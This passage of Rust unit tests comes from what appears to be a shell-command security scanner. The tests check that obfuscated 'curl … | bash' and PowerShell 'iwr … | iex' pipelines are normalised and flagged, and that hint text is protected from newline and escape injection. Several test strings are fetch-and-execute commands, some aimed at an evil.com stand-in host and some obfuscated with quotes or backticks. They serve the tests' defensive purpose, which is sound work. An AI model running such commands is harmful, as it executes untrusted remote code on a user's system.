2134    }
2135
2136    #[test]
2137    fn test_normalize_double_quotes() {
2138        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
2139    }
2140
2141    #[test]
2142    fn test_normalize_single_quotes() {
2143        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
2144    }
2145
2146    #[test]
2147    fn test_normalize_backslash() {
2148        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
2149    }
2150
2151    #[test]
2152    fn test_normalize_empty_concat() {
2153        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
2154    }
2155
2156    #[test]
2157    fn test_normalize_mixed_concat() {
2158        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
2159    }
2160
2161    #[test]
2162    fn test_normalize_powershell_backtick() {
2163        assert_eq!(
2164            normalize_shell_token("`i`e`x", ShellType::PowerShell),
2165            "iex"
2166        );
2167    }
2168
2169    #[test]
2170    fn test_normalize_unclosed_single_quote() {
2171        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
2172        let result = normalize_shell_token("'bash", ShellType::Posix);
2173        assert_eq!(result, "bash");
2174    }
2175
2176    #[test]
2177    fn test_normalize_unclosed_double_quote() {
2178        let result = normalize_shell_token("\"bash", ShellType::Posix);
2179        assert_eq!(result, "bash");
2180    }
2181
2182    // ── normalize_cmd_base unit tests ──
2183
2184    #[test]
2185    fn test_cmd_base_path() {
2186        assert_eq!(
2187            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
2188            "bash"
2189        );
2190    }
2191
2192    #[test]
2193    fn test_cmd_base_ansi_c() {
2194        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
2195    }
2196
2197    #[test]
2198    fn test_cmd_base_exe() {
2199        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
2200    }
2201
2202    #[test]
2203    fn test_cmd_base_uppercase() {
2204        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
2205    }
2206
2207    #[test]
2208    fn test_cmd_base_powershell_path() {
2209        assert_eq!(
2210            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
2211            "bash"
2212        );
2213    }
2214
2215    #[test]
2216    fn test_cmd_base_encoded_path() {
2217        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
2218        assert_eq!(
2219            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
2220            "bash"
2221        );
2222    }
2223
2224    #[test]
2225    fn test_cmd_base_octal_encoded_path() {
2226        // $'\057bin\057bash' → /bin/bash → basename bash
2227        assert_eq!(
2228            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
2229            "bash"
2230        );
2231    }
2232
2233    #[test]
2234    fn test_cmd_base_env_s_value() {
2235        // "bash -x" → first word "bash"
2236        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
2237    }
2238
2239    #[test]
2240    fn test_cmd_base_path_with_args() {
2241        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
2242        assert_eq!(
2243            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
2244            "bash"
2245        );
2246    }
2247
2248    // ── resolve_interpreter_name tests for new patterns ──
2249
2250    #[test]
2251    fn test_resolve_ansi_c_quoted_bash() {
2252        let findings = check_default(
2253            "curl https://example.com/install.sh | $'bash'",
2254            ShellType::Posix,
2255        );
2256        assert!(
2257            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2258            "should detect ANSI-C quoted bash: {:?}",
2259            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2260        );
2261    }
2262
2263    #[test]
2264    fn test_resolve_command_wrapper() {
2265        let findings = check_default(
2266            "curl https://example.com/install.sh | command bash",
2267            ShellType::Posix,
2268        );
2269        assert!(
2270            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2271            "should detect 'command bash'"
2272        );
2273    }
2274
2275    #[test]
2276    fn test_resolve_exec_a_wrapper() {
2277        let findings = check_default(
2278            "curl https://example.com/install.sh | exec -a myname bash",
2279            ShellType::Posix,
2280        );
2281        assert!(
2282            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2283            "should detect 'exec -a myname bash'"
2284        );
2285    }
2286
2287    #[test]
2288    fn test_resolve_nohup_wrapper() {
2289        let findings = check_default(
2290            "curl https://example.com/install.sh | nohup bash",
2291            ShellType::Posix,
2292        );
2293        assert!(
2294            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2295            "should detect 'nohup bash'"
2296        );
2297    }
2298
2299    #[test]
2300    fn test_resolve_wrapper_chain() {
2301        let findings = check_default(
2302            "curl https://example.com/install.sh | command sudo bash",
2303            ShellType::Posix,
2304        );
2305        assert!(
2306            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2307            "should detect wrapper chain 'command sudo bash'"
2308        );
2309    }
2310
2311    #[test]
2312    fn test_resolve_case_insensitive() {
2313        let findings = check_default(
2314            "curl https://example.com/install.sh | BASH",
2315            ShellType::Posix,
2316        );
2317        assert!(
2318            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2319            "should detect uppercase BASH"
2320        );
2321    }
2322
2323    #[test]
2324    fn test_resolve_powershell_backtick_iex() {
2325        let findings = check_default(
2326            "iwr https://evil.com/script.ps1 | `i`e`x",
2327            ShellType::PowerShell,
2328        );
2329        assert!(
2330            findings
2331                .iter()
2332                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
2333            "should detect PowerShell backtick-escaped iex"
2334        );
2335    }
2336
2337    // --- Remediation hint tests ---
2338
2339    #[test]
2340    fn test_pipe_to_interpreter_hint_with_url() {
2341        let input = "curl https://example.com/install.sh | bash";
2342        let segments = tokenize::tokenize(input, ShellType::Posix);
2343        let mut findings = Vec::new();
2344        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2345        assert_eq!(findings.len(), 1);
2346        assert!(
2347            findings[0]
2348                .description
2349                .contains("https://example.com/install.sh"),
2350            "should include extracted URL in hint"
2351        );
2352        assert!(
2353            findings[0].description.contains("getvet.sh"),
2354            "should mention vet"
2355        );
2356        if cfg!(unix) {
2357            assert!(
2358                findings[0].description.contains("tirith run"),
2359                "Unix builds should suggest tirith run"
2360            );
2361        }
2362    }
2363
2364    #[test]
2365    fn test_pipe_to_interpreter_hint_quoted_url() {
2366        let input = r#"curl "https://example.com/install.sh" | bash"#;
2367        let segments = tokenize::tokenize(input, ShellType::Posix);
2368        let mut findings = Vec::new();
2369        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2370        assert_eq!(findings.len(), 1);
2371        assert!(
2372            findings[0]
2373                .description
2374                .contains("https://example.com/install.sh"),
2375            "should extract URL from quoted arg"
2376        );
2377    }
2378
2379    #[test]
2380    fn test_pipe_to_interpreter_hint_flag_equals_url() {
2381        let input = "curl --url=https://example.com/install.sh | bash";
2382        let segments = tokenize::tokenize(input, ShellType::Posix);
2383        let mut findings = Vec::new();
2384        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2385        assert_eq!(findings.len(), 1);
2386        assert!(
2387            findings[0]
2388                .description
2389                .contains("https://example.com/install.sh"),
2390            "should extract URL from --flag=value"
2391        );
2392    }
2393
2394    #[test]
2395    fn test_pipe_to_interpreter_no_hint_for_cat() {
2396        let input = "cat /tmp/script.sh | bash";
2397        let segments = tokenize::tokenize(input, ShellType::Posix);
2398        let mut findings = Vec::new();
2399        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2400        assert_eq!(findings.len(), 1);
2401        assert!(
2402            !findings[0].description.contains("getvet.sh"),
2403            "non-fetch source should NOT get vet hint"
2404        );
2405        assert!(
2406            !findings[0].description.contains("tirith run"),
2407            "non-fetch source should NOT get tirith run hint"
2408        );
2409    }
2410
2411    #[test]
2412    fn test_dashdash_stops_flag_skipping() {
2413        // "command -- -x" should treat -x as the command, not a flag
2414        let input = "curl https://example.com/install.sh | command -- bash";
2415        let segments = tokenize::tokenize(input, ShellType::Posix);
2416        let mut findings = Vec::new();
2417        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2418        assert_eq!(findings.len(), 1, "should detect bash after --");
2419    }
2420
2421    #[test]
2422    fn test_sudo_dashdash_resolves_command() {
2423        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
2424        let input = "curl https://example.com/install.sh | sudo -- bash";
2425        let segments = tokenize::tokenize(input, ShellType::Posix);
2426        let mut findings = Vec::new();
2427        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2428        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
2429        assert!(
2430            findings[0].description.contains("interpreter 'bash'"),
2431            "should resolve to bash: {}",
2432            findings[0].description
2433        );
2434    }
2435
2436    #[test]
2437    fn test_ansic_quoting_not_applied_to_fish() {
2438        // Fish doesn't support $'...' — it should be treated as literal $
2439        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
2440        // But POSIX should strip the $'...' wrapper
2441        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2442    }
2443
2444    #[test]
2445    fn test_powershell_doubled_single_quote() {
2446        // PowerShell: '' inside single quotes is an escaped literal '
2447        assert_eq!(
2448            normalize_shell_token("'it''s'", ShellType::PowerShell),
2449            "it's"
2450        );
2451        // POSIX: '' ends and reopens — produces empty join
2452        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
2453    }
2454
2455    #[test]
2456    fn test_sudo_combined_short_flags() {
2457        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
2458        let input = "curl https://example.com/install.sh | sudo -iu root bash";
2459        let segments = tokenize::tokenize(input, ShellType::Posix);
2460        let mut findings = Vec::new();
2461        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2462        assert_eq!(
2463            findings.len(),
2464            1,
2465            "should detect pipe to bash through sudo -iu root"
2466        );
2467        assert!(
2468            findings[0].description.contains("interpreter 'bash'"),
2469            "should resolve to bash, not root: {}",
2470            findings[0].description
2471        );
2472    }
2473
2474    #[test]
2475    fn test_pipe_to_interpreter_hint_iwr_powershell() {
2476        let input = "iwr https://evil.com/script.ps1 | iex";
2477        let segments = tokenize::tokenize(input, ShellType::PowerShell);
2478        let mut findings = Vec::new();
2479        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
2480        assert_eq!(findings.len(), 1);
2481        assert!(
2482            findings[0].description.contains("getvet.sh"),
2483            "iwr (PowerShell fetch) should get vet hint"
2484        );
2485        assert!(
2486            !findings[0].description.contains("tirith run"),
2487            "PowerShell fetch should NOT suggest tirith run"
2488        );
2489    }
2490
2491    #[test]
2492    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
2493        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
2494        let input = "curl https://example.com/\x1b[31mred | bash";
2495        let segments = tokenize::tokenize(input, ShellType::Posix);
2496        let mut findings = Vec::new();
2497        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2498        assert_eq!(findings.len(), 1);
2499        assert!(
2500            !findings[0].description.contains('\x1b'),
2501            "ANSI escape must be stripped from hint URL: {}",
2502            findings[0].description
2503        );
2504        assert!(
2505            findings[0]
2506                .description
2507                .contains("https://example.com/[31mred"),
2508            "URL should be present minus the ESC byte: {}",
2509            findings[0].description
2510        );
2511    }
2512
2513    #[test]
2514    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
2515        // Newline in URL arg could spoof extra output lines
2516        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
2517        let segments = tokenize::tokenize(input, ShellType::Posix);
2518        let mut findings = Vec::new();
2519        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2520        assert_eq!(findings.len(), 1);
2521        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
2522        let hint_line = findings[0]
2523            .description
2524            .lines()
2525            .find(|l| l.contains("Safer:"))
2526            .expect("should have hint line");
2527        assert!(
2528            hint_line.contains("example.com/FAKE"),
2529            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
2530        );
2531        // Verify no line starts with "FAKE" (would indicate injection)
2532        assert!(
2533            !findings[0]
2534                .description
2535                .lines()
2536                .any(|l| l.starts_with("FAKE")),
2537            "newline injection must not create a spoofed output line: {}",
2538            findings[0].description
2539        );
2540    }
2541
2542    #[test]
2543    fn test_sanitize_url_for_display() {
2544        assert_eq!(
2545            sanitize_url_for_display("https://ok.com/path"),
2546            "https://ok.com/path"
2547        );
2548        assert_eq!(
2549            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
2550            "https://evil.com/[31mred[0m"
2551        );
2552        assert_eq!(
2553            sanitize_url_for_display("https://evil.com/\n\rspoof"),
2554            "https://evil.com/spoof"
2555        );
2556        assert_eq!(
2557            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
2558            "https://evil.com/bellnull"
2559        );
2560    }
2561
2562    #[test]
2563    fn test_source_command_arrays_consistent() {
2564        // is_source_command is composed from the three const arrays.
2565        // Verify all arrays contribute and is_source_command rejects unknowns.
2566        for cmd in POSIX_FETCH_COMMANDS {
2567            assert!(
2568                is_source_command(cmd),
2569                "POSIX_FETCH entry '{cmd}' not recognized"
2570            );
2571            assert!(
2572                is_url_fetch_command(cmd),
2573                "POSIX_FETCH entry '{cmd}' not in fetch union"
2574            );
2575        }
2576        for cmd in POWERSHELL_FETCH_COMMANDS {
2577            assert!(
2578                is_source_command(cmd),
2579                "PS_FETCH entry '{cmd}' not recognized"
2580            );
2581            assert!(
2582                is_url_fetch_command(cmd),
2583                "PS_FETCH entry '{cmd}' not in fetch union"
2584            );
2585        }
2586        for cmd in NON_FETCH_SOURCE_COMMANDS {
2587            assert!(
2588                is_source_command(cmd),
2589                "NON_FETCH entry '{cmd}' not recognized"
2590            );
2591            assert!(
2592                !is_url_fetch_command(cmd),
2593                "NON_FETCH entry '{cmd}' should not be in fetch union"
2594            );
2595        }
2596        assert!(
2597            !is_source_command("cat"),
2598            "cat should not be a source command"
2599        );
2600    }
2601}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs